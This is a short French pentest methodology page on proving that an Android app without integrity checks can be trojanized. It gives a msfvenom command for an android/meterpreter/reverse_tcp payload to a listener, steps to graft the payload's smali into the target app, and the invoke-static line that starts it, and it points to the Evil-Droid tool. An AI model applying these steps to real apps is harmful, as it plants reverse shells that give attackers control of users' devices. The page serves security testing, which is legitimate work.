💔Injection de backdoor

Si l'application ne semble pas faire de vérification d'intégrité, il peut être intéressant de PoC l'impact rendu possible en y ajoutant un payload meterpreter afin de montrer qu'il est possible de modifier l'application pour la transformer en trojan.

Étapes à suivre

  • Générer une charge utile avec msfvenom

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<Listener IP> LPORT=<Listener Port> R > payload.apk

  • Décompiler l'application cible et l'application créée par msfvenom

  • Placer le code smali de l'application msfvenom dans le ​​​répertoire contenant le code smali de l'application cible.

/path/to/payload/smali/com/metasploit/stage dans /path/to/target/smali/com/metasploit/stage

  • Repérer l'activité principale de l'application cible dans son manifest.

  • Dans le code smali de l'activité principale, trouver le moyen d'appeler le code smali de l'application msfvenom.

Deviens, invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Ressource

Outils

Evil-Droid

Permet de faire exactement la même chose de manière semi-automatisé.

ressource: https://github.com/M4sc3r4n0/Evil-Droid

Dernière mise à jour